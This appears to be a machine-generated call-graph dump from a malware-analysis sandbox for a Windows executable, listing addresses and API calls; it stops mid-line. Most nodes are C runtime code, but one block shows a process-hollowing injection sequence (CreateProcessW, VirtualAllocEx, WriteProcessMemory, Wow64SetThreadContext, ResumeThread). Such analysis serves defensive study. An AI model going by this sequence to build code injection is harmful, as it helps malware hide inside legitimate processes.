4d4241 TranslatorGuardHandler 5 API calls 9893->9894 9895 4d3e19 9894->9895 9895->9859 9897 4d4433 std::_Throw_Cpp_error 9896->9897 10103 4d467d 9897->10103 9903 4d3e58 std::_Throw_Cpp_error 9902->9903 9904 4d3ee3 9903->9904 10207 4d40f0 9903->10207 9905 4d4241 TranslatorGuardHandler 5 API calls 9904->9905 9906 4d3ca2 9905->9906 9906->9866 9910 4d41cb 9908->9910 9911 4d41e5 9910->9911 9912 4d7207 _unexpected 2 API calls 9910->9912 9914 4d41e7 std::_Throw_Cpp_error 9910->9914 9931 4d83c7 9910->9931 9911->9870 9912->9910 9913 4d49c1 std::_Throw_Cpp_error 9915 4d59fc std::_Throw_Cpp_error RaiseException 9913->9915 9914->9913 9938 4d59fc 9914->9938 9917 4d49de IsProcessorFeaturePresent 9915->9917 9919 4d49f4 9917->9919 9941 4d4ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9919->9941 9921 4d4ad7 9921->9870 9942 4d3fb0 9922->9942 9925 4d4241 TranslatorGuardHandler 5 API calls 9926 4d3d0e 9925->9926 9927 4d3f60 9926->9927 9928 4d3f95 9927->9928 9929 4d4241 TranslatorGuardHandler 5 API calls 9928->9929 9930 4d3d22 9929->9930 9930->9875 9937 4dbc45 _unexpected 9931->9937 9932 4dbc83 9933 4db757 __dosmaperr 14 API calls 9932->9933 9935 4dbc81 9933->9935 9934 4dbc6e RtlAllocateHeap 9934->9935 9934->9937 9935->9910 9936 4d7207 _unexpected 2 API calls 9936->9937 9937->9932 9937->9934 9937->9936 9939 4d5a16 9938->9939 9940 4d5a43 RaiseException 9938->9940 9939->9940 9940->9913 9941->9921 9943 4d3fe2 std::_Throw_Cpp_error 9942->9943 9944 4d4241 TranslatorGuardHandler 5 API calls 9943->9944 9945 4d3f36 9944->9945 9945->9925 9947 4db807 _unexpected 14 API calls 9946->9947 9948 4d6d88 9947->9948 9949 4db0cb ___free_lconv_mon 14 API calls 9948->9949 9950 4d6d95 9949->9950 9951 4d6d9c GetModuleHandleExW 9950->9951 9952 4d6db9 9950->9952 9951->9952 9953 4d6dc7 16 API calls 9952->9953 9954 4d6d13 9953->9954 9954->9884 9954->9890 9956 4d6d52 9955->9956 9957 4d6dd3 9955->9957 9956->9859 9958 4d6dd9 CloseHandle 9957->9958 9959 4d6de2 9957->9959 9958->9959 9960 4d6de8 FreeLibrary 9959->9960 9961 4d6df1 9959->9961 9960->9961 9962 4db0cb ___free_lconv_mon 14 API calls 9961->9962 9962->9956 9964 4d6e0c ___scrt_is_nonwritable_in_current_image 9963->9964 9965 4d6e20 9964->9965 9966 4d6e13 GetLastError ExitThread 9964->9966 9967 4da00a _unexpected 48 API calls 9965->9967 9968 4d6e25 9967->9968 9979 4db976 9968->9979 9971 4d6e3c 9983 4d3d40 9971->9983 9980 4db986 __FrameHandler3::FrameUnwindToState 9979->9980 9981 4d6e30 9979->9981 9980->9981 10000 4d9d93 9980->10000 9981->9971 9994 4d9cea 9981->9994 9984 4d3f60 5 API calls 9983->9984 9985 4d3d6d std::_Throw_Cpp_error 9984->9985 10003 4d40a0 9985->10003 9990 4d3e30 5 API calls 9991 4d3da6 9990->9991 9992 4d4241 TranslatorGuardHandler 5 API calls 9991->9992 9993 4d3db5 9992->9993 9997 4d6d69 9993->9997 9995 4d9e9e _unexpected 5 API calls 9994->9995 9996 4d9d06 9995->9996 9996->9971 10091 4d6e7e 9997->10091 10001 4d9e9e _unexpected 5 API calls 10000->10001 10002 4d9daf 10001->10002 10002->9981 10011 4ccd10 GetPEB 10003->10011 10006 4d48cb GetCurrentThreadId 10083 4d4c86 10006->10083 10010 4d48e4 __Mtx_unlock __Cnd_broadcast 10086 4d4c92 10010->10086 10018 4d84a7 10011->10018 10016 4d4241 TranslatorGuardHandler 5 API calls 10017 4ccd82 10016->10017 10017->10006 10019 4d84ba __strnicoll 10018->10019 10033 4d8537 10019->10033 10022 4d7fd7 __strnicoll 48 API calls 10023 4ccd62 10022->10023 10024 4cc860 10023->10024 10031 4cc890 10024->10031 10026 4ccced 10027 4d4241 TranslatorGuardHandler 5 API calls 10026->10027 10029 4cccf9 10027->10029 10029->10016 10031->10026 10057 4cbeb0 CreateFileA 10031->10057 10067 4c86c0 10031->10067 10074 4c1000 10031->10074 10080 4c8ea0 10031->10080 10034 4d8567 10033->10034 10035 4d8594 10034->10035 10036 4d8576 10034->10036 10047 4d856b 10034->10047 10038 4d85a1 10035->10038 10042 4d84de ___scrt_uninitialize_crt 48 API calls 10035->10042 10037 4d7f12 __strnicoll 29 API calls 10036->10037 10037->10047 10039 4d85d9 10038->10039 10040 4d85bb 10038->10040 10044 4d85ed 10039->10044 10045 4d8769 10039->10045 10043 4dda19 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10040->10043 10041 4d4241 TranslatorGuardHandler 5 API calls 10046 4d84cc 10041->10046 10042->10038 10043->10047 10044->10047 10049 4d8687 10044->10049 10051 4d8631 10044->10051 10045->10047 10048 4dd131 ___scrt_uninitialize_crt WideCharToMultiByte 10045->10048 10046->10022 10047->10041 10048->10047 10050 4dd131 ___scrt_uninitialize_crt WideCharToMultiByte 10049->10050 10053 4d869a 10050->10053 10052 4dd131 ___scrt_uninitialize_crt WideCharToMultiByte 10051->10052 10052->10047 10053->10047 10054 4d86b3 GetLastError 10053->10054 10054->10047 10056 4d86c2 10054->10056 10055 4dd131 ___scrt_uninitialize_crt WideCharToMultiByte 10055->10056 10056->10047 10056->10055 10061 4cbf29 10057->10061 10058 4cc021 GetFileSize 10058->10061 10059 4cc083 ReadFile 10059->10061 10060 4cc12c CloseHandle 10060->10061 10061->10058 10061->10059 10061->10060 10062 4cc059 CloseHandle 10061->10062 10063 4cc14b 10061->10063 10065 4cc10d CloseHandle 10061->10065 10062->10061 10064 4d4241 TranslatorGuardHandler 5 API calls 10063->10064 10066 4cc160 10064->10066 10065->10061 10066->10031 10072 4c8783 std::_Throw_Cpp_error 10067->10072 10068 4ce9b0 5 API calls std::_Throw_Cpp_error 10068->10072 10069 4c8dd8 10070 4d4241 TranslatorGuardHandler 5 API calls 10069->10070 10071 4c8de8 10070->10071 10071->10031 10072->10068 10072->10069 10073 4cea10 51 API calls std::_Throw_Cpp_error 10072->10073 10073->10072 10075 4c1041 10074->10075 10076 4c7eb0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10075->10076 10077 4c1451 10076->10077 10078 4d4241 TranslatorGuardHandler 5 API calls 10077->10078 10079 4c7e16 10078->10079 10079->10031 10081 4cd560 std::_Throw_Cpp_error 48 API calls 10080->10081 10082 4c8eb6 10081->10082 10082->10031 10089 4d51de EnterCriticalSection 10083->10089 10085 4d4c90 10085->10010 10090 4d51ec LeaveCriticalSection 10086->10090 10088 4d3d9e 10088->9990 10089->10085 10090->10088 10092 4da15b __dosmaperr 14 API calls 10091->10092 10094 4d6e89 10092->10094 10093 4d6ecb ExitThread 10094->10093 10096 4d6ea2 10094->10096 10100 4d9d25 10094->10100 10097 4d6eb5 10096->10097 10098 4d6eae CloseHandle 10096->10098 10097->10093 10099 4d6ec1 FreeLibraryAndExitThread 10097->10099 10098->10097 10099->10093 10101 4d9e9e _unexpected 5 API calls 10100->10101 10102 4d9d3e 10101->10102 10102->10096 10104 4d4689 __EH_prolog3_GS 10103->10104 10105 4c86c0 std::_Throw_Cpp_error 51 API calls 10104->10105 10106 4d469d 10105->10106 10113 4d45a6 10106->10113 10131 4d42e6 10113->10131 10115 4d45d7 10135 4d4533 10115->10135 10118 4cd560 std::_Throw_Cpp_error 48 API calls 10119 4d45f9 10118->10119 10120 4d4241 TranslatorGuardHandler 5 API calls 10119->10120 10121 4d4618 10120->10121 10122 4cd560 10121->10122 10124 4cd584 std::_Throw_Cpp_error 10122->10124 10123 4cd6bf std::_Throw_Cpp_error 10125 4d4241 TranslatorGuardHandler 5 API calls 10123->10125 10124->10123 10204 4cd780 10124->10204 10126 4cd6f5 10125->10126 10128 4d4bd9 10126->10128 10129 4d4241 TranslatorGuardHandler 5 API calls 10128->10129 10130 4d4be3 10129->10130 10130->10130 10133 4d42fe 10131->10133 10132 4d4305 CatchIt 10132->10115 10133->10132 10147 4cf980 10133->10147 10136 4d453f __EH_prolog3_GS 10135->10136 10138 4d455e std::_Throw_Cpp_error 10136->10138 10174 4d434e 10136->10174 10139 4d434e std::_Throw_Cpp_error 51 API calls 10138->10139 10140 4d4583 10139->10140 10141 4cd560 std::_Throw_Cpp_error 48 API calls 10140->10141 10142 4d458b std::_Throw_Cpp_error 10141->10142 10143 4cd560 std::_Throw_Cpp_error 48 API calls 10142->10143 10144 4d459e 10143->10144 10145 4d4bd9 std::_Throw_Cpp_error 5 API calls 10144->10145 10146 4d45a5 std::domain_error::domain_error 10145->10146 10146->10118 10149 4cf9a4 10147->10149 10150 4cfeac 10149->10150 10154 4cff00 10149->10154 10162 4d0ff0 10149->10162 10151 4d4241 TranslatorGuardHandler 5 API calls 10150->10151 10152 4cfebc 10151->10152 10152->10132 10159 4cffa3 10154->10159 10155 4d0ff0 21 API calls std::_Throw_Cpp_error 10155->10159 10156 4d0642 10157 4d4241 TranslatorGuardHandler 5 API calls 10156->10157 10158 4d0fc0 10157->10158 10158->10149 10159->10155 10159->10156 10165 4d1010 10159->10165 10169 4d7d79 10159->10169 10163 4d41c6 std::_Throw_Cpp_error 21 API calls 10162->10163 10164 4d1007 10163->10164 10164->10149 10166 4d101e std::_Throw_Cpp_error 10165->10166 10167 4d59fc std::_Throw_Cpp_error RaiseException 10166->10167 10168 4d1036 10167->10168 10170 4d809f __strnicoll 48 API calls 10169->10170 10171 4d7d88 10170->10171 10172 4d7d96 __strnicoll 11 API calls 10171->10172 10173 4d7d95 10172->10173 10175 4d438f 10174->10175 10176 4d4365 CatchIt 10174->10176 10178 4d476d 10175->10178 10176->10138 10179 4d4828 10178->10179 10180 4d4792 10178->10180 10201 4cf170 10179->10201 10189 4cf4d0 10180->10189 10185 4cf980 std::_Throw_Cpp_error 51 API calls 10186 4d47ae CatchIt 10185->10186 10188 4d47fa CatchIt 10186->10188 10195 4cd7f0 10186->10195 10188->10176 10190 4cf718 10189->10190 10191 4cf2e0 std::_Throw_Cpp_error 5 API calls 10190->10191 10192 4cf94d 10190->10192 10191->10190 10193 4d4241 TranslatorGuardHandler 5 API calls 10192->10193 10194 4cf960 10193->10194 10194->10185 10197 4cd8d2 10195->10197 10196 4ce5ad std::_Throw_Cpp_error 10198 4d4241 TranslatorGuardHandler 5 API calls 10196->10198 10197->10196 10200 4ce600 std::_Throw_Cpp_error 48 API calls 10197->10200 10199 4ce5d5 10198->10199 10199->10188 10200->10197 10202 4d4846 std::_Xinvalid_argument 50 API calls 10201->10202 10203 4cf182 10202->10203 10205 4cd7f0 std::_Throw_Cpp_error 48 API calls 10204->10205 10206 4cd7ab 10205->10206 10206->10124 10208 4d4114 10207->10208 10209 4d4241 TranslatorGuardHandler 5 API calls 10208->10209 10210 4d4196 10209->10210 10210->9903 10212 4d4968 GetExitCodeThread 10211->10212 10213 4d499a 10211->10213 10212->10213 10214 4d4979 CloseHandle 10212->10214 10213->9844 10214->9844 10217 4d8477 ___scrt_is_nonwritable_in_current_image 10216->10217 10218 4da00a _unexpected 48 API calls 10217->10218 10221 4d847c 10218->10221 10219 4d835d __FrameHandler3::FrameUnwindToState 48 API calls 10220 4d84a6 10219->10220 10221->10219 10223 4d6a8f ___scrt_uninitialize_crt 10222->10223 10225 4d6a7d 10222->10225 10223->8995 10224 4d6a8b 10224->8995 10225->10224 10227 4db4a7 10225->10227 10230 4db5d2 10227->10230 10233 4db6ab 10230->10233 10234 4db6b7 ___scrt_is_nonwritable_in_current_image 10233->10234 10241 4d8161 EnterCriticalSection 10234->10241 10236 4db72d 10250 4db74b 10236->10250 10238 4db6c1 ___scrt_uninitialize_crt 10238->10236 10242 4db61f 10238->10242 10241->10238 10243 4db62b ___scrt_is_nonwritable_in_current_image 10242->10243 10253 4d6aef EnterCriticalSection 10243->10253 10245 4db635 ___scrt_uninitialize_crt 10249 4db66e 10245->10249 10254 4db4b0 10245->10254 10267 4db69f 10249->10267 10366 4d8178 LeaveCriticalSection 10250->10366 10252 4db4ae 10252->10224 10253->10245 10255 4db4c5 __strnicoll 10254->10255 10256 4db4cc 10255->10256 10257 4db4d7 10255->10257 10258 4db5d2 ___scrt_uninitialize_crt 77 API calls 10256->10258 10270 4db515 10257->10270 10260 4db4d2 10258->10260 10262 4d7fd7 __strnicoll 48 API calls 10260->10262 10264 4db50f 10262->10264 10264->10249 10265 4db4f8 10283 4de11f 10265->10283 10365 4d6b03 LeaveCriticalSection 10267->10365 10269 4db68d 10269->10238 10271 4db52e 10270->10271 10272 4db4e1 10270->10272 10271->10272 10273 4dd936 ___scrt_uninitialize_crt 48 API calls 10271->10273 10272->10260 10276 4dd936 10272->10276 10274 4db54a 10273->10274 10294 4de45a 10274->10294 10277 4dd957 10276->10277 10278 4dd942 10276->10278 10277->10265 10279 4db757 __dosmaperr 14 API calls 10278->10279 10280 4dd947 10279->10280 10281 4d7d69 __strnicoll 48 API calls 10280->10281 10282 4dd952 10281->10282 10282->10265 10284 4de13d 10283->10284 10285 4de130 10283->10285 10287 4de186 10284->10287 10291 4de164 10284->10291 10286 4db757 __dosmaperr 14 API calls 10285->10286 10289 4de135 10286->10289 10288 4db757 __dosmaperr 14 API calls 10287->10288 10290 4de18b 10288->10290 10289->10260 10292 4d7d69 __strnicoll 48 API calls 10290->10292 10335 4de19c 10291->10335 10292->10289 10296 4de466 ___scrt_is_nonwritable_in_current_image 10294->10296 10295 4de46e 10295->10272 10296->10295 10297 4de4a7 10296->10297 10299 4de4ed 10296->10299 10298 4d7f12 __strnicoll 29 API calls 10297->10298 10298->10295 10305 4dd8d7 EnterCriticalSection 10299->10305 10301 4de4f3 10302 4de511 10301->10302 10306 4de23e 10301->10306 10332 4de563 10302->10332 10305->10301 10307 4de266 10306->10307 10331 4de289 ___scrt_uninitialize_crt 10306->10331 10308 4de26a 10307->10308 10310 4de2c5 10307->10310 10309 4d7f12 __strnicoll 29 API calls 10308->10309 10309->10331 10311 4de2e3 10310->10311 10312 4dfa51 ___scrt_uninitialize_crt 50 API calls 10310->10312 10313 4de56b ___scrt_uninitialize_crt 49 API calls 10311->10313 10312->10311 10314 4de2f5 10313->10314 10315 4de2fb 10314->10315 10316 4de342 10314->10316 10317 4de32a 10315->10317 10318 4de303 10315->10318 10319 4de3ab WriteFile 10316->10319 10320 4de356 10316->10320 10321 4de5e8 ___scrt_uninitialize_crt 54 API calls 10317->10321 10325 4de9af ___scrt_uninitialize_crt 6 API calls 10318->10325 10318->10331 10322 4de3cd GetLastError 10319->10322 10319->10331 10323 4de35e 10320->10323 10324 4de397 10320->10324 10321->10331 10322->10331 10327 4de383 10323->10327 10328 4de363 10323->10328 10326 4dea17 ___scrt_uninitialize_crt 7 API calls 10324->10326 10325->10331 10326->10331 10329 4debdb ___scrt_uninitialize_crt 8 API calls 10327->10329 10330 4deaf2 ___scrt_uninitialize_crt 7 API calls 10328->10330 10328->10331 10329->10331 10330->10331 10331->10302 10333 4dd8fa ___scrt_uninitialize_crt LeaveCriticalSection 10332->10333 10334 4de569 10333->10334 10334->10295 10336 4de1a8 ___scrt_is_nonwritable_in_current_image 10335->10336 10348 4dd8d7 EnterCriticalSection 10336->10348 10338 4de1b7 10339 4de1fc 10338->10339 10349 4dd68e 10338->10349 10340 4db757 __dosmaperr 14 API calls 10339->10340 10343 4de203 10340->10343 10342 4de1e3 FlushFileBuffers 10342->10343 10344 4de1ef GetLastError 10342->10344 10362 4de232 10343->10362 10345 4db76a __dosmaperr 14 API calls 10344->10345 10345->10339 10348->10338 10350 4dd69b 10349->10350 10351 4dd6b0 10349->10351 10352 4db76a __dosmaperr 14 API calls 10350->10352 10353 4db76a __dosmaperr 14 API calls 10351->10353 10357 4dd6d5 10351->10357 10354 4dd6a0 10352->10354 10355 4dd6e0 10353->10355 10356 4db757 __dosmaperr 14 API calls 10354->10356 10358 4db757 __dosmaperr 14 API calls 10355->10358 10359 4dd6a8 10356->10359 10357->10342 10360 4dd6e8 10358->10360 10359->10342 10361 4d7d69 __strnicoll 48 API calls 10360->10361 10361->10359 10363 4dd8fa ___scrt_uninitialize_crt LeaveCriticalSection 10362->10363 10364 4de21b 10363->10364 10364->10289 10365->10269 10366->10252 8851 4cbe70 8852 4cbe9b 8851->8852 8855 4d6ed5 8852->8855 8858 4d7020 8855->8858 8859 4d704d 8858->8859 8860 4d705f 8858->8860 8885 4d53ec GetModuleHandleW 8859->8885 8870 4d71ba 8860->8870 8865 4cbeaf 8869 4d70b1 8871 4d71c6 ___scrt_is_nonwritable_in_current_image 8870->8871 8893 4d8161 EnterCriticalSection 8871->8893 8873 4d71d0 8894 4d70b7 8873->8894 8875 4d71dd 8898 4d71fb 8875->8898 8878 4d6fef 8923 4d6fd6 8878->8923 8880 4d6ff9 8881 4d700d 8880->8881 8882 4d6ffd GetCurrentProcess TerminateProcess 8880->8882 8883 4d6f54 __FrameHandler3::FrameUnwindToState 3 API calls 8881->8883 8882->8881 8884 4d7015 ExitProcess 8883->8884 8886 4d53f8 8885->8886 8886->8860 8887 4d6f54 GetModuleHandleExW 8886->8887 8888 4d6fb4 8887->8888 8889 4d6f93 GetProcAddress 8887->8889 8890 4d6fba FreeLibrary 8888->8890 8891 4d6fc3 8888->8891 8889->8888 8892 4d6fa7 8889->8892 8890->8891 8891->8860 8892->8888 8893->8873 8895 4d70c3 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 8894->8895 8896 4d7127 __FrameHandler3::FrameUnwindToState 8895->8896 8901 4d776b 8895->8901 8896->8875 8922 4d8178 LeaveCriticalSection 8898->8922 8900 4d7096 8900->8865 8900->8878 8902 4d7777 __EH_prolog3 8901->8902 8905 4d79f6 8902->8905 8904 4d779e __FrameHandler3::FrameUnwindToState 8904->8896 8906 4d7a02 ___scrt_is_nonwritable_in_current_image 8905->8906 8913 4d8161 EnterCriticalSection 8906->8913 8908 4d7a10 8914 4d78c1 8908->8914 8913->8908 8915 4d78d8 8914->8915 8916 4d78e0 8914->8916 8918 4d7a45 8915->8918 8916->8915 8917 4db0cb ___free_lconv_mon 14 API calls 8916->8917 8917->8915 8921 4d8178 LeaveCriticalSection 8918->8921 8920 4d7a2e 8920->8904 8921->8920 8922->8900 8926 4db94f 8923->8926 8925 4d6fdb __FrameHandler3::FrameUnwindToState 8925->8880 8927 4db95e __FrameHandler3::FrameUnwindToState 8926->8927 8928 4db96b 8927->8928 8930 4d9d53 8927->8930 8928->8925 8931 4d9e9e _unexpected 5 API calls 8930->8931 8932 4d9d6f 8931->8932 8932->8928 11352 4da5f0 11353 4da5fc ___scrt_is_nonwritable_in_current_image 11352->11353 11364 4d8161 EnterCriticalSection 11353->11364 11355 4da603 11365 4dd839 11355->11365 11358 4da621 11384 4da647 11358->11384 11363 4da732 2 API calls 11363->11358 11364->11355 11366 4dd845 ___scrt_is_nonwritable_in_current_image 11365->11366 11367 4dd86f 11366->11367 11368 4dd84e 11366->11368 11387 4d8161 EnterCriticalSection 11367->11387 11369 4db757 __dosmaperr 14 API calls 11368->11369 11371 4dd853 11369->11371 11372 4d7d69 __strnicoll 48 API calls 11371->11372 11373 4da612 11372->11373 11373->11358 11378 4da67c GetStartupInfoW 11373->11378 11374 4dd8a7 11395 4dd8ce 11374->11395 11376 4dd87b 11376->11374 11388 4dd789 11376->11388 11379 4da699 11378->11379 11380 4da61c 11378->11380 11379->11380 11381 4dd839 49 API calls 11379->11381 11380->11363 11382 4da6c1 11381->11382 11382->11380 11383 4da6f1 GetFileType 11382->11383 11383->11382 11399 4d8178 LeaveCriticalSection 11384->11399 11386 4da632 11387->11376 11389 4db807 _unexpected 14 API calls 11388->11389 11392 4dd79b 11389->11392 11390 4dd7a8 11391 4db0cb ___free_lconv_mon 14 API calls 11390->11391 11393 4dd7fd 11391->11393 11392->11390 11394 4d9c11 6 API calls 11392->11394 11393->11376 11394->11392 11398 4d8178 LeaveCriticalSection 11395->11398 11397 4dd8d5 11397->11373 11398->11397 11399->11386 11409 4d6bf0 11410 4db4a7 ___scrt_uninitialize_crt 77 API calls 11409->11410 11411 4d6bf8 11410->11411 11419 4db864 11411->11419 11413 4d6bfd 11429 4db90f 11413->11429 11416 4d6c27 11417 4db0cb ___free_lconv_mon 14 API calls 11416->11417 11418 4d6c32 11417->11418 11420 4db870 ___scrt_is_nonwritable_in_current_image 11419->11420 11433 4d8161 EnterCriticalSection 11420->11433 11422 4db8e7 11440 4db906 11422->11440 11425 4db8bb DeleteCriticalSection 11427 4db0cb ___free_lconv_mon 14 API calls 11425->11427 11428 4db87b 11427->11428 11428->11422 11428->11425 11434 4ded63 11428->11434 11430 4d6c0c DeleteCriticalSection 11429->11430 11431 4db926 11429->11431 11430->11413 11430->11416 11431->11430 11432 4db0cb ___free_lconv_mon 14 API calls 11431->11432 11432->11430 11433->11428 11435 4ded76 __strnicoll 11434->11435 11443 4dee21 11435->11443 11437 4ded82 11438 4d7fd7 __strnicoll 48 API calls 11437->11438 11439 4ded8e 11438->11439 11439->11428 11515 4d8178 LeaveCriticalSection 11440->11515 11442 4db8f3 11442->11413 11444 4dee2d ___scrt_is_nonwritable_in_current_image 11443->11444 11445 4dee5a 11444->11445 11446 4dee37 11444->11446 11453 4dee52 11445->11453 11454 4d6aef EnterCriticalSection 11445->11454 11447 4d7f12 __strnicoll 29 API calls 11446->11447 11447->11453 11449 4dee78 11455 4ded93 11449->11455 11451 4dee85 11469 4deeb0 11451->11469 11453->11437 11454->11449 11456 4deda0 11455->11456 11457 4dedc3 11455->11457 11458 4d7f12 __strnicoll 29 API calls 11456->11458 11459 4db515 ___scrt_uninitialize_crt 73 API calls 11457->11459 11467 4dedbb 11457->11467 11458->11467 11460 4deddb 11459->11460 11461 4db90f 14 API calls 11460->11461 11462 4dede3 11461->11462 11463 4dd936 ___scrt_uninitialize_crt 48 API calls 11462->11463 11464 4dedef 11463->11464 11472 4e001b 11464->11472 11467->11451 11468 4db0cb ___free_lconv_mon 14 API calls 11468->11467 11514 4d6b03 LeaveCriticalSection 11469->11514 11471 4deeb6 11471->11453 11475 4dedf6 11472->11475 11476 4e0044 11472->11476 11473 4e0093 11474 4d7f12 __strnicoll 29 API calls 11473->11474 11474->11475 11475->11467 11475->11468 11476->11473 11477 4e006b 11476->11477 11479 4e00be 11477->11479 11480 4e00ca ___scrt_is_nonwritable_in_current_image 11479->11480 11487 4dd8d7 EnterCriticalSection 11480->11487 11482 4e0109 11501 4e0143 11482->11501 11483 4e00d8 11483->11482 11488 4dff7b 11483->11488 11487->11483 11489 4dd68e ___scrt_uninitialize_crt 48 API calls 11488->11489 11492 4dff8b 11489->11492 11490 4dff91 11504 4dd6f8 11490->11504 11492->11490 11493 4dffc3 11492->11493 11495 4dd68e ___scrt_uninitialize_crt 48 API calls 11492->11495 11493->11490 11494 4dd68e ___scrt_uninitialize_crt 48 API calls 11493->11494 11496 4dffcf CloseHandle 11494->11496 11497 4dffba 11495->11497 11496->11490 11498 4dffdb GetLastError 11496->11498 11499 4dd68e ___scrt_uninitialize_crt 48 API calls 11497->11499 11498->11490 11499->11493 11500 4dffe9 ___scrt_uninitialize_crt 11500->11482 11513 4dd8fa LeaveCriticalSection 11501->11513 11503 4e012c 11503->11475 11505 4dd76e 11504->11505 11507 4dd707 11504->11507 11506 4db757 __dosmaperr 14 API calls 11505->11506 11508 4dd773 11506->11508 11507->11505 11512 4dd731 11507->11512 11509 4db76a __dosmaperr 14 API calls 11508->11509 11510 4dd75e 11509->11510 11510->11500 11511 4dd758 SetStdHandle 11511->11510 11512->11510 11512->11511 11513->11503 11514->11471 11515->11442 8835 4eb18d 8839 4eb1c3 8835->8839 8836 4eb310 GetPEB 8837 4eb322 CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 8836->8837 8838 4eb3c9 WriteProcessMemory 8837->8838 8837->8839 8840 4eb40e 8838->8840 8839->8836 8839->8837 8841 4eb3b9 TerminateProcess 8839->8841 8842 4eb413 WriteProcessMemory 8840->8842 8843 4eb450 WriteProcessMemory Wow64SetThreadContext ResumeThread 8840->8843 8841->8839 8842->8840 10764 4d5610 10765 4d5618 10764->10765 10783 4d82ea 10765->10783 10767 4d5623 10790 4d50f0 10767->10790 10769 4d5444 4 API calls 10771 4d56ba 10769->10771 10770 4d5638 __RTC_Initialize 10781 4d5695 10770->10781 10796 4d4f6a 10770->10796 10773 4d5651 10799 4d73a5 10773->10799 10777 4d5667 10832 4d5933 10777->10832 10779 4d568a 10838 4d72a4 10779->10838 10781->10769 10782 4d56b2 10781->10782 10784 4d831c 10783->10784 10785 4d82f9 10783->10785 10784->10767 10785->10784 10786 4db757 __dosmaperr 14 API calls 10785->10786 10787 4d830c 10786->10787 10788 4d7d69 __strnicoll 48 API calls 10787->10788 10789 4d8317 10788->10789 10789->10767 10791 4d50fc 10790->10791 10792 4d5100 10790->10792 10791->10770 10793 4d5444 4 API calls 10792->10793 10795 4d510d ___scrt_release_startup_lock 10792->10795 10794 4d5176 10793->10794 10795->10770 10845 4d4f7f 10796->10845 10800 4d73ff 10799->10800 10801 4d7437 10800->10801 10802 4d7421 10800->10802 10823 4d565c 10800->10823 10803 4da880 58 API calls 10801->10803 10804 4db757 __dosmaperr 14 API calls 10802->10804 10805 4d743d 10803->10805 10806 4d7426 10804->10806 10880 4dca78 GetModuleFileNameW 10805->10880 10808 4d7d69 __strnicoll 48 API calls 10806->10808 10808->10823 10814 4d7499 10816 4db757 __dosmaperr 14 API calls 10814->10816 10815 4d74a5 10817 4d753c 48 API calls 10815->10817 10818 4d749e 10816->10818 10819 4d74bb 10817->10819 10822 4db0cb ___free_lconv_mon 14 API calls 10818->10822 10819->10818 10820 4d74df 10819->10820 10902 4dc24a 10820->10902 10822->10823 10823->10781 10831 4d5918 InitializeSListHead 10823->10831 10825 4d74f6 10827 4db0cb ___free_lconv_mon 14 API calls 10825->10827 10826 4d7500 10829 4db0cb ___free_lconv_mon 14 API calls 10826->10829 10828 4d74fe 10827->10828 10830 4db0cb ___free_lconv_mon 14 API calls 10828->10830 10829->10828 10830->10823 10831->10777 11129 4d76b0 10832->11129 10834 4d5944 10835 4d594b 10834->10835 10836 4d5444 4 API calls 10834->10836 10835->10779 10837 4d5953 10836->10837 10839 4da00a _unexpected 48 API calls 10838->10839 10841 4d72af 10839->10841 10840 4d72e7 10840->10781 10841->10840 10842 4db757 __dosmaperr 14 API calls 10841->10842 10843 4d72dc 10842->10843 10844 4d7d69 __strnicoll 48 API calls 10843->10844 10844->10840 10846 4d4f8e 10845->10846 10847 4d4f95 10845->10847 10851 4d77a9 10846->10851 10854 4d7738 10847->10854 10850 4d4f75 10850->10773 10852 4d7738 51 API calls 10851->10852 10853 4d77bb 10852->10853 10853->10850 10857 4d799b 10854->10857 10858 4d79a7 ___scrt_is_nonwritable_in_current_image 10857->10858 10865 4d8161 EnterCriticalSection 10858->10865 10860 4d79b5 10866 4d77bf 10860->10866 10862 4d79c2 10876 4d79ea 10862->10876 10865->10860 10867 4d77da 10866->10867 10875 4d784d _unexpected 10866->10875 10869 4dd0c4 51 API calls 10867->10869 10874 4d782d 10867->10874 10867->10875 10868 4dd0c4 51 API calls 10870 4d7843 10868->10870 10871 4d7823 10869->10871 10873 4db0cb ___free_lconv_mon 14 API calls 10870->10873 10872 4db0cb ___free_lconv_mon 14 API calls 10871->10872 10872->10874 10873->10875 10874->10868 10874->10875 10875->10862 10879 4d8178 LeaveCriticalSection 10876->10879 10878 4d7769 10878->10850 10879->10878 10881 4dcab8 10880->10881 10882 4dcaa7 GetLastError 10880->10882 10884 4dc274 48 API calls 10881->10884 10883 4db77d __dosmaperr 14 API calls 10882->10883 10885 4dcab3 10883->10885 10886 4dcae9 10884->10886 10888 4d4241 TranslatorGuardHandler 5 API calls 10885->10888 10928 4dcb54 10886->10928 10889 4d7450 10888->10889 10890 4d753c 10889->10890 10892 4d7562 10890->10892 10894 4d75c0 10892->10894 10956 4dcc16 10892->10956 10893 4d7483 10896 4d73b0 10893->10896 10894->10893 10895 4dcc16 48 API calls 10894->10895 10895->10894 10897 4d73c1 10896->10897 10901 4d73f3 10896->10901 10898 4db807 _unexpected 14 API calls 10897->10898 10897->10901 10899 4d73ea 10898->10899 10900 4db0cb ___free_lconv_mon 14 API calls 10899->10900 10900->10901 10901->10814 10901->10815 10903 4dc365 10902->10903 10904 4dc375 10903->10904 10913 4dc38b _strpbrk 10903->10913 10905 4db757 __dosmaperr 14 API calls 10904->10905 10906 4dc37a 10905->10906 10907 4d7d69 __strnicoll 48 API calls 10906->10907 10921 4d74ee 10907->10921 10908 4dc3f6 10908->10908 10909 4d73b0 14 API calls 10908->10909 10911 4dc439 10909->10911 10914 4dc442 10911->10914 10922 4dc458 10911->10922 10913->10908 10915 4dc40a 10913->10915 10962 4dc72a 10913->10962 11014 4dc7db 10913->11014 10916 4db0cb ___free_lconv_mon 14 API calls 10914->10916 11050 4dc67e 10915->11050 10916->10915 10917 4dc4b8 10918 4db0cb ___free_lconv_mon 14 API calls 10917->10918 10920 4dc4c5 10918->10920 10923 4dc67e 14 API calls 10920->10923 10921->10825 10921->10826 10922->10917 10922->10922 10925 4dc4d5 10922->10925 11056 4df42e 10922->11056 10923->10921 10926 4d7d96 __strnicoll 11 API calls 10925->10926 10927 4dc4e1 10926->10927 10929 4dcb70 10928->10929 10944 4dcb61 10928->10944 10930 4dcb9d 10929->10930 10931 4dcb78 10929->10931 10932 